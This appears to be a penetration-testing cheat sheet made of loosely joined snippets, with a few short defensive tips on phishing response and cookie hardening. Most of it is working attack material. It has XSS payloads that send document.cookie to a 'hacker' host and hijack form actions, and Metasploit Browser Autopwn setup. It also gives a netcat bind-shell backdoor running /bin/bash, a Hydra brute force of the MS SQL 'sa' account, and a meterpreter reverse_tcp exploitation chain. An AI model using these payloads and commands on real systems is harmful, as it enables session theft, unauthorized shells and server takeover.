Stealing Cookie:
"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>
<script>var i = new Image();i.src="http://hacker/log.php?q="+document.cookie;</script>
Work with Browser Autopwn:
<IFRAME src='http://hacker'><\/IFRAME>
For more information, refer to my project at "https://github.com/d3m0n4l3x/alexfuzz".
1) Enter Metasploit msfconsole:
# msfconsole
2) Select Browser Autopwn:
msf5 > use auxiliary/server/browser_autopwn
OR
msf5 > use auxiliary/server/browser_autopwn2
3) Set up corresponding settings:
msf5 auxiliary(server/browser_autopwn) > set LHOST 192.168.0.XX /*P.S.: 192.168.0.XX is the IP address of this machine.*/
msf5 auxiliary(server/browser_autopwn) > set SRVPORT 80
msf5 auxiliary(server/browser_autopwn) > set URIPATH /
4) Start the malicious web server:
msf5 auxiliary(server/browser_autopwn) > exploit
5) Metasploit then would show you a "Local IP" URL, which should be browsed by the tested machine, as shown below:
[*] --- Done, found 20 exploit modules
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.0.XX:80/ /*P.S.: http://192.168.0.XX:80/ is the URL needed to be browsed by the tested machine.*/
[*] Server started.
6) If the tested machine is vulnerable, a meterpreter should be showing up shortly.
Here are some test cases for DOM-based Cross Site Scripting:
"><img src="aaa" onerror="alert(document.cookie">
"><svg/onload="alert(document.cookie">
"><svg/onload="document.forms[0].action='//192.168.0.253/get.php'">
Detection:
- Utilize Threat Intelligence information to confirm if it is a phishing email.
- Phone the sender to confirm if it is a phishing email.
Response:
- Report to Federal Trade Commission at spam@uce.gov.
- Report to the finance institution being impersonated.
- Update the detection and mitigation rules on Email Security system.
1) Specify the flags below in the cookie:
expires=
domain=
path=
secure
HttpOnly
2) Use Session ID / Token only instead of other meaningful flags.
3) Set up a Whitelist mechanism to validate user input data.
4) Leverage such encode functions as HtmlEncode to filter out some dangerous characters (e.g. "<" and ">").
TIPS: Some AntiXSS libraries could be utilized in an effort to mitigate the risk against Cross Site Scripting easily
Reference: https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
This cheat sheet is based on the rewritten version of NetCat, namely ncat, which is portion of Nmap.
Port Scan:
# ncat -z -w1 -n -v 192.168.0.251 22
Socket Client:
# ncat -nvv 192.168.0.251 443
Socket Server:
# ncat -vv -l -p 443
Keepalived Socket Server:
In Windows:
cmd > nc -L -p 443
In Linux/Unix:
# ncat -k -p 443
Authentication Server allowing specific clients:
Only allow 192.168.0.253 to connect the socket:
ncat --allow 192.168.0.253 -vv -l -p 443
Only deny 192.168.0.251 to connect the socket:
ncat --deny 192.168.0.251 -vv -l -p 443
Backdoor Server:
# ncat -l -p 888 -e /bin/bash
File Transferring:
Recepient / Server:
# ncat -l -p 8888 > /tmp/test.txt
Sender / Client:
# ncat -w3 -n 192.168.0.253 8888 < ./test.txt
The examples below demonstrate how to create Netcat sockets continuously listening in Windows and Linux/Unix, respectively.
In Windows:
cmd > nc -vv -L -p 443
In Linux/Unix:
# ncat -vv -k -l -p 443
First confirm if MS SQL Server is running on the default port.
# nmap -Pn -sS -p 1433 192.168.0.25
After that, try to ascentain the details of the MS SQL Server.
# nmap -v -p 1433 --script=ms-sql-info 192.168.0.25
Subsequent to having the details regardin the authentication means, Hydra could be utilized to brute force the password.
# hydra -s 1433 -l sa -P /usr/share/wordlists/sqlmap.txt
Through Metasploit, let us complete the final step of the exploitation.
# msfconsole
msf > use exploit/windows/mssql/mssql_payload
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST XXX.XXX.XXX.XXX
msf > set RHOST XXX.XXX.XXX.XXX
msf > set USERNAME sa
msf > set PASSWORD XXXXX
msf > run
